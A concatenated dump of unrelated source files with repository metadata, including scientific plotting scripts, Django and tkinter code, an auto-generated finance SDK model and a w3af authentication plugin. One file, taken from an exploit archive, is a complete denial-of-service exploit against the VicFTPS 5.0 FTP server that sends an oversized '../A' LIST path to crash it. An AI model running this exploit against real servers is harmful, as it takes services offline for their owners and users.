do_analysis(blue_dset_cut, red_dset_cut, th_below_blue, th_above_blue, th_below_red, th_above_red, 'YAP', 'Chlor','Threshold adaptive' + '(blocksize, offset =' + str(blocksize) + ', ' + str(offset) + ')', 'below thr', 'above thr',Pixel_size[index])
### 5) random_walker not yet working
## http://scikit-image.org/docs/dev/auto_examples/segmentation/plot_random_walker_segmentation.html#example-segmentation-plot-random-walker-segmentation-py
if do_random_walker:
cutofflow = 0.89
cutoffhigh = 0.9
rw_below_blue, rw_above_blue, rw_below_red, rw_above_red = random_walker_dset(red_dset_cut, blue_dset_cut,cutofflow, cutoffhigh)
do_analysis(blue_dset_cut, red_dset_cut, rw_below_blue, rw_above_blue, rw_below_red, rw_above_red, 'YAP', 'Chlor','Random walker'+ '(cutoffs high, low =' + str(cutoffhigh) + ', ' + str(cutofflow) + ')', 'background', 'foreground',Pixel_size[index])
### 6) Otsu thresholding
if do_otsu:
ot_below_blue, ot_above_blue, ot_below_red, ot_above_red = thr_otsu(red_dset_cut, blue_dset_cut)
do_analysis(blue_dset_cut, red_dset_cut, ot_below_blue, ot_above_blue, ot_below_red, ot_above_red, 'YAP', 'Chlor','Otsu threshold', 'background', 'foreground',Pixel_size[index])
#print('here1')
#log_dog_doh(blue_dset_cut)
#print('here2')
#log_dog_doh(blue_dset_cut)
multipage(name[index] + '.pdf')
plt.show() | [
"[email protected]"
] | |
48050f4660f52648eea4935b898f348604a3dd8d | 82ef9a0dd1618a28770597227acfc0150b948af2 | /wearnow/gui/editors/displaytabs/notebackreflist.py | 08022d00f1eb026cafa2cb4ba841b487ad4196ea | [] | no_license | bmcage/wearnow | ef32a7848472e79e56763b38551835aa97864b21 | c8dfa75e1ea32b0c021d71c4f366ab47104c207e | refs/heads/master | 2021-01-16T00:27:59.597812 | 2016-01-19T11:55:03 | 2016-01-19T11:55:03 | 37,195,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,354 | py | #
# WearNow - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2006 Donald N. Allingham
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# WearNow classes
#
#-------------------------------------------------------------------------
from .backrefmodel import BackRefModel
from .backreflist import BackRefList
class NoteBackRefList(BackRefList):
def __init__(self, dbstate, uistate, track, obj, callback=None):
BackRefList.__init__(self, dbstate, uistate, track, obj,
BackRefModel, callback=callback)
def get_icon_name(self):
return 'wearnow-notes'
| [
"[email protected]"
] | |
51edc73fef326593e88f5869e483e8ee2ac7edec | f72c9e46af5ce5ac738693daf65e67a0962a229a | /sdk/lusid/models/term_deposit_all_of.py | 96afcca4bb2ceee362d5973da47c3cb76093addc | [
"MIT"
] | permissive | finbourne/lusid-sdk-python | db8ce602f8408169f6583783c80ebbef83c77807 | 32fedc00ce5a37a6fe3bd9b9962570a8a9348e48 | refs/heads/master | 2023-08-29T18:22:49.488811 | 2023-08-29T15:57:26 | 2023-08-29T15:57:26 | 125,082,278 | 11 | 11 | NOASSERTION | 2023-04-28T07:16:48 | 2018-03-13T16:31:54 | Python | UTF-8 | Python | false | false | 14,288 | py | # coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 1.0.463
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from lusid.configuration import Configuration
class TermDepositAllOf(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
'start_date': 'datetime',
'maturity_date': 'datetime',
'contract_size': 'float',
'flow_convention': 'FlowConventions',
'rate': 'float',
'dom_ccy': 'str',
'instrument_type': 'str'
}
attribute_map = {
'start_date': 'startDate',
'maturity_date': 'maturityDate',
'contract_size': 'contractSize',
'flow_convention': 'flowConvention',
'rate': 'rate',
'dom_ccy': 'domCcy',
'instrument_type': 'instrumentType'
}
required_map = {
'start_date': 'required',
'maturity_date': 'required',
'contract_size': 'required',
'flow_convention': 'required',
'rate': 'required',
'dom_ccy': 'optional',
'instrument_type': 'required'
}
def __init__(self, start_date=None, maturity_date=None, contract_size=None, flow_convention=None, rate=None, dom_ccy=None, instrument_type=None, local_vars_configuration=None): # noqa: E501
"""TermDepositAllOf - a model defined in OpenAPI"
:param start_date: The start date of the instrument. For term deposits this is the start date of the interest calculation period. (required)
:type start_date: datetime
:param maturity_date: The maturity date of the instrument. For term deposits this is the last date of the interest calculation period. (required)
:type maturity_date: datetime
:param contract_size: The principal amount of the term deposit. (required)
:type contract_size: float
:param flow_convention: (required)
:type flow_convention: lusid.FlowConventions
:param rate: The fixed rate for the term deposit. Specified as a decimal, e.g 0.03 is meant to be 3% interest (required)
:type rate: float
:param dom_ccy: The domestic currency of the instrument. This should be the same as the Currency set on the FlowConventions.
:type dom_ccy: str
:param instrument_type: The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CapFloor, CashSettled, CdsIndex, Basket, FundingLeg, FxSwap, ForwardRateAgreement, SimpleInstrument, Repo, Equity, ExchangeTradedOption, ReferenceInstrument, ComplexBond, InflationLinkedBond, InflationSwap, SimpleCashFlowLoan (required)
:type instrument_type: str
""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._start_date = None
self._maturity_date = None
self._contract_size = None
self._flow_convention = None
self._rate = None
self._dom_ccy = None
self._instrument_type = None
self.discriminator = None
self.start_date = start_date
self.maturity_date = maturity_date
self.contract_size = contract_size
self.flow_convention = flow_convention
self.rate = rate
self.dom_ccy = dom_ccy
self.instrument_type = instrument_type
@property
def start_date(self):
"""Gets the start_date of this TermDepositAllOf. # noqa: E501
The start date of the instrument. For term deposits this is the start date of the interest calculation period. # noqa: E501
:return: The start_date of this TermDepositAllOf. # noqa: E501
:rtype: datetime
"""
return self._start_date
@start_date.setter
def start_date(self, start_date):
"""Sets the start_date of this TermDepositAllOf.
The start date of the instrument. For term deposits this is the start date of the interest calculation period. # noqa: E501
:param start_date: The start_date of this TermDepositAllOf. # noqa: E501
:type start_date: datetime
"""
if self.local_vars_configuration.client_side_validation and start_date is None: # noqa: E501
raise ValueError("Invalid value for `start_date`, must not be `None`") # noqa: E501
self._start_date = start_date
@property
def maturity_date(self):
"""Gets the maturity_date of this TermDepositAllOf. # noqa: E501
The maturity date of the instrument. For term deposits this is the last date of the interest calculation period. # noqa: E501
:return: The maturity_date of this TermDepositAllOf. # noqa: E501
:rtype: datetime
"""
return self._maturity_date
@maturity_date.setter
def maturity_date(self, maturity_date):
"""Sets the maturity_date of this TermDepositAllOf.
The maturity date of the instrument. For term deposits this is the last date of the interest calculation period. # noqa: E501
:param maturity_date: The maturity_date of this TermDepositAllOf. # noqa: E501
:type maturity_date: datetime
"""
if self.local_vars_configuration.client_side_validation and maturity_date is None: # noqa: E501
raise ValueError("Invalid value for `maturity_date`, must not be `None`") # noqa: E501
self._maturity_date = maturity_date
@property
def contract_size(self):
"""Gets the contract_size of this TermDepositAllOf. # noqa: E501
The principal amount of the term deposit. # noqa: E501
:return: The contract_size of this TermDepositAllOf. # noqa: E501
:rtype: float
"""
return self._contract_size
@contract_size.setter
def contract_size(self, contract_size):
"""Sets the contract_size of this TermDepositAllOf.
The principal amount of the term deposit. # noqa: E501
:param contract_size: The contract_size of this TermDepositAllOf. # noqa: E501
:type contract_size: float
"""
if self.local_vars_configuration.client_side_validation and contract_size is None: # noqa: E501
raise ValueError("Invalid value for `contract_size`, must not be `None`") # noqa: E501
self._contract_size = contract_size
@property
def flow_convention(self):
"""Gets the flow_convention of this TermDepositAllOf. # noqa: E501
:return: The flow_convention of this TermDepositAllOf. # noqa: E501
:rtype: lusid.FlowConventions
"""
return self._flow_convention
@flow_convention.setter
def flow_convention(self, flow_convention):
"""Sets the flow_convention of this TermDepositAllOf.
:param flow_convention: The flow_convention of this TermDepositAllOf. # noqa: E501
:type flow_convention: lusid.FlowConventions
"""
if self.local_vars_configuration.client_side_validation and flow_convention is None: # noqa: E501
raise ValueError("Invalid value for `flow_convention`, must not be `None`") # noqa: E501
self._flow_convention = flow_convention
@property
def rate(self):
"""Gets the rate of this TermDepositAllOf. # noqa: E501
The fixed rate for the term deposit. Specified as a decimal, e.g 0.03 is meant to be 3% interest # noqa: E501
:return: The rate of this TermDepositAllOf. # noqa: E501
:rtype: float
"""
return self._rate
@rate.setter
def rate(self, rate):
"""Sets the rate of this TermDepositAllOf.
The fixed rate for the term deposit. Specified as a decimal, e.g 0.03 is meant to be 3% interest # noqa: E501
:param rate: The rate of this TermDepositAllOf. # noqa: E501
:type rate: float
"""
if self.local_vars_configuration.client_side_validation and rate is None: # noqa: E501
raise ValueError("Invalid value for `rate`, must not be `None`") # noqa: E501
self._rate = rate
@property
def dom_ccy(self):
"""Gets the dom_ccy of this TermDepositAllOf. # noqa: E501
The domestic currency of the instrument. This should be the same as the Currency set on the FlowConventions. # noqa: E501
:return: The dom_ccy of this TermDepositAllOf. # noqa: E501
:rtype: str
"""
return self._dom_ccy
@dom_ccy.setter
def dom_ccy(self, dom_ccy):
"""Sets the dom_ccy of this TermDepositAllOf.
The domestic currency of the instrument. This should be the same as the Currency set on the FlowConventions. # noqa: E501
:param dom_ccy: The dom_ccy of this TermDepositAllOf. # noqa: E501
:type dom_ccy: str
"""
self._dom_ccy = dom_ccy
@property
def instrument_type(self):
"""Gets the instrument_type of this TermDepositAllOf. # noqa: E501
The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CapFloor, CashSettled, CdsIndex, Basket, FundingLeg, FxSwap, ForwardRateAgreement, SimpleInstrument, Repo, Equity, ExchangeTradedOption, ReferenceInstrument, ComplexBond, InflationLinkedBond, InflationSwap, SimpleCashFlowLoan # noqa: E501
:return: The instrument_type of this TermDepositAllOf. # noqa: E501
:rtype: str
"""
return self._instrument_type
@instrument_type.setter
def instrument_type(self, instrument_type):
"""Sets the instrument_type of this TermDepositAllOf.
The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CapFloor, CashSettled, CdsIndex, Basket, FundingLeg, FxSwap, ForwardRateAgreement, SimpleInstrument, Repo, Equity, ExchangeTradedOption, ReferenceInstrument, ComplexBond, InflationLinkedBond, InflationSwap, SimpleCashFlowLoan # noqa: E501
:param instrument_type: The instrument_type of this TermDepositAllOf. # noqa: E501
:type instrument_type: str
"""
if self.local_vars_configuration.client_side_validation and instrument_type is None: # noqa: E501
raise ValueError("Invalid value for `instrument_type`, must not be `None`") # noqa: E501
allowed_values = ["QuotedSecurity", "InterestRateSwap", "FxForward", "Future", "ExoticInstrument", "FxOption", "CreditDefaultSwap", "InterestRateSwaption", "Bond", "EquityOption", "FixedLeg", "FloatingLeg", "BespokeCashFlowsLeg", "Unknown", "TermDeposit", "ContractForDifference", "EquitySwap", "CashPerpetual", "CapFloor", "CashSettled", "CdsIndex", "Basket", "FundingLeg", "FxSwap", "ForwardRateAgreement", "SimpleInstrument", "Repo", "Equity", "ExchangeTradedOption", "ReferenceInstrument", "ComplexBond", "InflationLinkedBond", "InflationSwap", "SimpleCashFlowLoan"] # noqa: E501
if self.local_vars_configuration.client_side_validation and instrument_type not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `instrument_type` ({0}), must be one of {1}" # noqa: E501
.format(instrument_type, allowed_values)
)
self._instrument_type = instrument_type
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TermDepositAllOf):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, TermDepositAllOf):
return True
return self.to_dict() != other.to_dict()
| [
"[email protected]"
] | |
dc20d47c77e072ae91e749eeca8edf20f26f99a1 | 4f7aa44d21ae38093869e79e10f5cdc8842d48b7 | /05-mylibrary-lab-next/presentation/app_main_window.py | 8979bca4b7ccccd07d557f3862a560c0266e63e2 | [
"Apache-2.0"
] | permissive | iproduct/intro-python | 31e802c2c21a4df3361656f12d267ec52c2d6564 | 7e08e144da2907fcf45dc734ab4e896631625d75 | refs/heads/master | 2023-02-19T11:42:37.522624 | 2023-02-13T15:54:03 | 2023-02-13T15:54:03 | 128,980,155 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,198 | py | from tkinter import *
from tkinter import ttk, messagebox
from dao.book_repository_json import BookRepositoryJson
from presentation.add_edit_book_dialog import AddEditBookDialog
from utils.tkinter_utils import print_hierarchy, get_ceter_window_left_top
MAIN_WIDTH = 800
MAIN_HEIGHT = 600
class AppMainWindow(ttk.Frame):
def __init__(self, root, application):
super().__init__(root, padding="3 3 12 12")
self.application = application
root.title("My Library")
print(f"Windowing system: {root.tk.call('tk', 'windowingsystem')}") # return x11, win32, aqua
root.option_add('*tearOff', FALSE) # remove menu tear off ability
left, top = get_ceter_window_left_top(root, MAIN_WIDTH, MAIN_HEIGHT)
root.geometry(f"{MAIN_WIDTH}x{MAIN_HEIGHT}+{left}+{top}")
self.grid(column=0, row=0, sticky=(N, W, E, S) )
self.menubar = Menu(root)
root['menu'] = self.menubar
# File menu
menu_file = Menu(self.menubar)
self.menubar.add_cascade(menu=menu_file, label="File", underline=0)
menu_file.add_command(label='New', command = self.newFile, underline=0, accelerator="Control+Shift+N")
self.bind_all("<Control-Shift-KeyPress-N>", self.newFile)
print("!!!", menu_file.entryconfigure(0))
menu_file.add_command(label="Open ...", command = self.openFile)
menu_file.add_command(label='Close', command = self.closeFile)
menu_file.entryconfigure('Close', state=DISABLED)
# Books menu
menu_books = Menu(self.menubar)
self.menubar.add_cascade(menu=menu_books, label="Books", underline=0)
menu_books.add_command(label='Add New Book', command=self.application.show_add_book, underline=2)
        menu_books.add_command(label='Browse Books', command=self.application.browseBooks)  # pass the method itself, do not call it at menu-build time
def newFile(self, event = None):
messagebox.showinfo(title="New File Dialog", message="Creating DB file ...")
def openFile(self):
messagebox.showinfo(title="File Open Dialog", message="Opening DB file ...")
def closeFile(self):
messagebox.showinfo(title="File Close Dialog", message="Closing DB file ...")
| [
"[email protected]"
] | |
0c33ff75f22af311c81bd6cebc6adb11379e4481 | 7124a12aee78af2cf3cdd5adbe38debd07fda07b | /Simulaciones/Proyecto_4_2/Scripts/Potencial_Graphics.py | 3da508c74cc29aebc52f670a7ed4bf17cbdb5dd2 | [] | no_license | giovannilopez9808/Notas_Agosto_2020 | e52ac9dd150037d0a8981fb765bcf0a7e73ed04b | 5fc8d5baabbe9ed5f3ee1b33c59e7ae4e5aff526 | refs/heads/master | 2023-02-01T07:50:38.559046 | 2020-12-14T05:18:34 | 2020-12-14T05:18:34 | 293,427,083 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,990 | py | import numpy as np
import matplotlib.pyplot as plt
#<-----------------------------Potential--------------------->
def potential_lj(r,e,sigma):
v=4*e*((sigma/r)**12-(sigma/r)**6)
return v
#<----------------------------Force--------------------->
def force_lj(r,e,sigma):
f=4*e*(12*sigma**12/r**13-6*sigma**6/r**7)
return f
#
def potencial_fene(r,e,ra):
k=10*e
v=-k*ra**2*np.log(1-(r/ra)**2)/2
return v
#
def force_fene(r,e,ra):
k=10*e
f=k*r/((1-(r/ra)**2))
return f
#
def graphic(r,sum,lj,fene,ylim,label,name):
    #<----------------------------Output file locations-------------------->
dir_graphics="../Graphics/"
plt.xlim(r[0],1.3);plt.ylim(-5,ylim)
plt.plot(r,sum,lw=3,color="#7400b8",label=label+"$(r)$")
plt.plot(r,lj,lw=3,color="#5390d9",label=label+"$_{LJ}$",ls="--")
plt.plot(r,fene,lw=3,color="#64dfdf",label=label+"$_{FENE}$",ls="--")
plt.ylabel(label+"(r)");plt.xlabel("Distancia radial (r)")
plt.legend(frameon=False,ncol=1,loc="upper center",fontsize=12)
plt.subplots_adjust(left=0.121,bottom=0.11,right=0.924,top=0.943)
plt.savefig(dir_graphics+name+".png")
plt.clf()
#<------------------------Parameters-------------------->
sigma=1;e=1;ra=1.3
#<------------------------------Radius values---------------------->
r=np.arange(0.8,1.29+0.01,0.01);n=np.size(r)
v=np.zeros(np.size(r));v_lj=np.zeros(np.size(r));v_fene=np.zeros(np.size(r))
f=np.zeros(np.size(r));f_lj=np.zeros(np.size(r));f_fene=np.zeros(np.size(r))
#<----------------------------Potential-------------------->
for i in range(n):
r_i=r[i]
if r_i<2.5:
v_lj[i]+=potential_lj(r_i,e,sigma)
f_lj[i]+=force_lj(r_i,e,sigma)
if r_i<ra:
v_fene[i]+=potencial_fene(r_i,e,ra)
f_fene[i]+=force_fene(r_i,e,ra)
v=v_lj+v_fene
f=f_lj+f_fene
graphic(r,v,v_lj,v_fene,30,"V","potential")
graphic(r,f,f_lj,f_fene,150,"F","force") | [
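# Hedged formula note (standard definitions assumed): the plotted curves combine
#   V_LJ(r) = 4*e*((sigma/r)**12 - (sigma/r)**6) for r < 2.5
#   V_FENE(r) = -(k*ra**2/2)*ln(1 - (r/ra)**2), with k = 10*e, for r < ra
# Note the sign conventions differ: force_lj returns -dV/dr while force_fene
# returns +dV/dr, so the combined F(r) curve mixes the two.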
"[email protected]"
] | |
54282bbde50ae71e65e4fb61139e2c5fb38a6790 | b953909018be86cf8cdf328e2b13395c1dbe28c0 | /apps/yt_barcode/urls.py | 63a531af7e694e0637fd5fcc51edabbfa4bd2f2f | [] | no_license | wangyong240/mes | 06ce26d146aebe0b0103dda4fdd198c3cefc6014 | 12d7321c1b96ae0fdd8f26029462e1943a500c01 | refs/heads/master | 2023-01-01T13:29:29.853063 | 2020-09-19T01:19:22 | 2020-09-19T01:19:22 | 296,762,233 | 1 | 0 | null | 2020-09-19T01:20:05 | 2020-09-19T01:20:04 | null | UTF-8 | Python | false | false | 95 | py | from django.conf.urls.defaults import *
urlpatterns = patterns('yt_barcode.views',
)
| [
"[email protected]"
] | |
edcd5818de24ad48b4dd91248306c61d7ac34f7b | 44b6bc41fe8e424196f98dbc5b2f050c1f9645f8 | /platforms/windows/dos/16230.py | e8600ad68d652ef330e3daac086438f90ca632dd | [] | no_license | angeloobeta/exploit-database | 21283dd8549f47836a35af6f3ea7b63b8dba11ea | 43f3d9e94c01a7f51e30561a96214af231dd9d36 | refs/heads/master | 2021-08-08T21:07:38.794539 | 2017-11-11T05:01:28 | 2017-11-11T05:01:28 | 110,380,452 | 0 | 1 | null | 2017-11-11T21:09:05 | 2017-11-11T21:09:04 | null | UTF-8 | Python | false | false | 3,696 | py | #!/usr/bin/python
#
#
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx
# xxxxx xxx xxx xxx xxx xxx xxx xxxxxx
# xxx xxx xxx xxx xxx xxx xxx xxxxxxxx xxxxxxxx xxxxxxxxx
# xxxxxx xxx xxx xxx xxx xxx xxx xx xx xx xx xx
# xxx xxx xxx xxx xxx xxx xxx xxx xx xx xx xxxx xx xxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxx xxxxxxxx xx xx xx xx
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxx xxxxxx xx xx xxxxxxxxx
#
#
#[+]Exploit Title: Exploit Denial of Service VicFTPS
#[+]Date: 02\24\11
#[+]Author C4SS!0 G0M3S
#[+]Software Link: http://vicftps.50webs.com/VicFTPS-5.0-bin.zip
#[+]Version: 5.0
#[+]Tested On: WIN-XP SP3
#[+]CVE: N/A
#[+]Language: Portuguese
#
#
#Author C4SS!0 G0M3S || Cassio Gomes
#E-mail [email protected]
#Site www.x000.org/
#
#
import socket
import time
import os
import sys
if os.name == 'nt':
    os.system("cls")  # if Windows
    os.system("color 4f")
else:
    os.system("clear")  # if Linux
def usage():
print """
============================================================
============================================================
===============Exploit Denial of Service Vicftps 5.0========
    ===============Author C4SS!0 G0M3S || C\xe1ssio Gomes=========
===============E-mail [email protected]==================
===============Site www.x000.org/===========================
============================================================
============================================================
"""
if len(sys.argv)!=3:
usage()
print "\t\t[-]Modo de Uso: python %s <Host> <Porta>" % sys.argv[0]
print "\t\t[-]Exemplo: python %s 192.168.1.2 21" % sys.argv[0]
sys.exit(0)
buf = "../A" * (330/4)
usage()
print "\t\t[+]Conectando-se Ao Servidor %s\n" % sys.argv[1]
time.sleep(1)
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
print "\t\t[+]Checando se o Servidor e Vulneravel\n"
time.sleep(1)
banner = s.recv(2000)
if((banner.find("VicFTPS"))!=-1):
print "\t\t[+]Servidor e Vulneravel:)\n"
time.sleep(1)
else:
print "\t\t[+]Sinto Muito, Servidor Nao e Vulneravel:(\n"
time.sleep(1)
print "\t\t[+]Enviando Exploit Denial of Service\n"
time.sleep(1)
s.send("USER anonymous\r\n")
s.recv(2000)
s.send("PASS\r\n")
s.recv(2000)
s.send("LIST "+buf+"\r\n")
print "\t\t[+]Exploit Enviado Com Sucesso ao Servidor "+sys.argv[1]+"\n"
time.sleep(1)
print "\t\t[+]Checando Se o Exploit Funcionou\n"
time.sleep(1)
try:
sock = socket.socket(socket.AF_INET,sock.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
print "\t\t[+]Sinto Muito o Exploit Nao Funcionou:(\n"
time.sleep(1)
sys.exit(0)
except:
print "\t\t[+]Exploit Funcionou, Servidor Derrubado:)\n"
time.sleep(1)
except:
print "\t\t[+]Erro ao Se Conectar no Servidor "+sys.argv[1]+" Na Porta "+sys.argv[2]+"\n"
| [
"[email protected]"
] | |
e8cc7618e6732e6c875b28838d8f4542ddb359da | addfc0757e0b620fd27858853aab3996fe37b7fe | /backend/talkback_21080/wsgi.py | e2190e49df445abc47705e96b12874299248f2b7 | [] | no_license | crowdbotics-apps/talkback-21080 | c8692837edef8591f29b1d72706b732fb72a7aba | e34baaaf37582c5ace5bb79c7091139c1ca0ebde | refs/heads/master | 2022-12-27T08:45:51.269041 | 2020-10-05T00:06:09 | 2020-10-05T00:06:09 | 301,252,632 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | """
WSGI config for talkback_21080 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'talkback_21080.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
ed1e78002b6d5631a704ce698be181c232c0acf8 | a475b8dfdbc90a57470b5be8dfd6fa2367de73f3 | /testproj/testapp/models.py | f7132e89fc9556e3630c00942b04b806b562cece | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | Moliholy/django-tastypie-crust | 9080be75726385716d75280f68cef7ad25b90761 | 520154aa36aa4ba9e132c4ea1d042ea8bcb235b2 | refs/heads/master | 2020-03-18T19:26:20.528764 | 2018-05-28T12:10:52 | 2018-06-12T14:53:26 | 135,154,352 | 0 | 0 | null | 2018-05-28T11:53:52 | 2018-05-28T11:53:51 | null | UTF-8 | Python | false | false | 508 | py | #!/usr/bin/env python
# -*- coding: utf-8
from django.db import models
from django.utils.translation import ugettext, ugettext_lazy as _
class Homepage(models.Model):
user = models.ForeignKey('auth.User')
url = models.URLField()
class Meta:
verbose_name = _('Homepage')
verbose_name_plural = _('Homepages')
def __unicode__(self):
format = ugettext('Homepage %(url)s of user %(username)s')
return format % {'url': self.url, 'username': self.user.username}
| [
"[email protected]"
] | |
a31dfce1ad8bf27319d90f5801053f00d781a11e | 2ffd40f761b266a5f033fefb9faff4ab9bfa8c89 | /bin/chardetect | 9a8a190a8f753c149aa7f8a02563c8d8ecf4d214 | [] | no_license | Sasikumar-P/facebook-api | 6850df1a9bf7dc9837853f74e28a11b4a15c585b | bc1ae820597916cb3e534e772b4c9e366b4091cf | refs/heads/master | 2021-09-01T22:57:39.298239 | 2017-12-29T02:36:13 | 2017-12-29T02:36:13 | 115,678,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | #!/home/sasi/Desktop/graphapi/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
88d961648002f0954e825a25e4a6df90ad2cc19a | 84c9a6fb5e18741f14a55d0d737e2a556383770d | /venv/Lib/site-packages/w3af/plugins/auth/detailed.py | e59db0c2a76390e6865939efe4857822f81e8d51 | [] | no_license | AravindChan96/Vulcan | 638a1db2f84df08bc50dd76c7f142014d529fbec | 5548a6f36f04108ac1a6ed8e707930f9821f0bd9 | refs/heads/master | 2022-11-05T15:05:54.224578 | 2020-06-19T20:44:14 | 2020-06-19T20:44:14 | 273,396,348 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 10,305 | py | """
detailed.py
Copyright 2011 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
from urllib import quote_plus
import w3af.core.controllers.output_manager as om
from w3af.core.controllers.plugins.auth_plugin import AuthPlugin
from w3af.core.controllers.exceptions import BaseFrameworkException
from w3af.core.data.options.opt_factory import opt_factory
from w3af.core.data.options.option_list import OptionList
from w3af.core.data.url.handlers.redirect import GET_HEAD_CODES
class detailed(AuthPlugin):
"""
Detailed authentication plugin.
"""
MAX_REDIRECTS = 10
def __init__(self):
AuthPlugin.__init__(self)
# User configuration
self.username = ''
self.password = ''
self.username_field = ''
self.password_field = ''
self.method = 'POST'
self.data_format = '%u=%U&%p=%P'
self.auth_url = 'http://host.tld/'
self.check_url = 'http://host.tld/'
self.check_string = ''
self.follow_redirects = False
self.url_encode_params = True
# Internal attributes
self._show_login_error = True
self._attempt_login = True
def login(self):
"""
Login to the application
"""
#
# In some cases the authentication plugin is incorrectly configured and
# we don't want to keep trying over and over to login when we know it
# will fail
#
if not self._attempt_login:
return False
#
# Create a new debugging ID for each login() run
#
self._new_debugging_id()
self._clear_log()
msg = 'Logging into the application with user: %s' % self.username
self._log_debug(msg)
#
# Send the auth HTTP request
#
data = self._get_data_from_format()
functor = getattr(self._uri_opener, self.method)
try:
http_response = functor(self.auth_url,
data,
grep=False,
cache=False,
follow_redirects=self.follow_redirects,
debugging_id=self._debugging_id)
except Exception, e:
msg = 'Failed to login to the application because of exception: %s'
self._log_debug(msg % e)
return False
self._log_http_response(http_response)
#
# Check if we're logged in
#
if not self.has_active_session():
self._log_info_to_kb()
return False
om.out.debug('Login success for %s' % self.username)
return True
def logout(self):
"""
User logout
"""
return None
def has_active_session(self):
"""
Check user session
"""
# Create a new debugging ID for each has_active_session() run
self._new_debugging_id()
msg = 'Checking if session for user %s is active'
self._log_debug(msg % self.username)
try:
http_response = self._uri_opener.GET(self.check_url,
grep=False,
cache=False,
follow_redirects=True,
debugging_id=self._debugging_id)
except Exception, e:
msg = 'Failed to check if session is active because of exception: %s'
self._log_debug(msg % e)
return False
self._log_http_response(http_response)
body = http_response.get_body()
logged_in = self.check_string in body
msg_yes = 'User "%s" is currently logged into the application'
